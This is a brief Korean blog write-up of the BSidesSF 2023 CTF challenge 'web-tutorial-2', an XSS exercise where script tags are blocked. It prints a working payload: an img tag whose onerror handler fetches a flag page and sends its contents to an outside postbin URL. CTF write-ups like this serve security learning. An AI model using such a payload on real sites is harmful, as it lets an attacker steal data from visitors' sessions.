본문 바로가기
CTF

[BSidesSF 2023 CTF] web-tutorial-2

by skyepodium 2023. 4. 22.

1. 개요

XSS, CSP 문제

 

2. 분석

첫번째 문제와 다르게 script 태그는 사용하지 못하지만, 자바스크립트 이벤트 핸들러는 가능하다고 합니다. 스크립트 태그 없이 XSS를 실행시킵니다.

 

<img srcset=",,,,,x" onerror="fetch('/xss-two-flag').then(r => r.text()).then(t => fetch('https://www.toptal.com/developers/postbin/1682170081878-4064430973958?flag='+t))">

 

'CTF' 카테고리의 다른 글

[angstromCTF 2023] directory  (0) 2023.04.22
[BSidesSF 2023 CTF] web-tutorial-3  (0) 2023.04.22
[BSidesSF 2023 CTF] web-tutorial-1  (0) 2023.04.22
[BSidesSF 2023 CTF] overflow  (0) 2023.04.22
[CryptoBurst CTF] breakfast  (0) 2022.08.20

관련글

티스토리툴바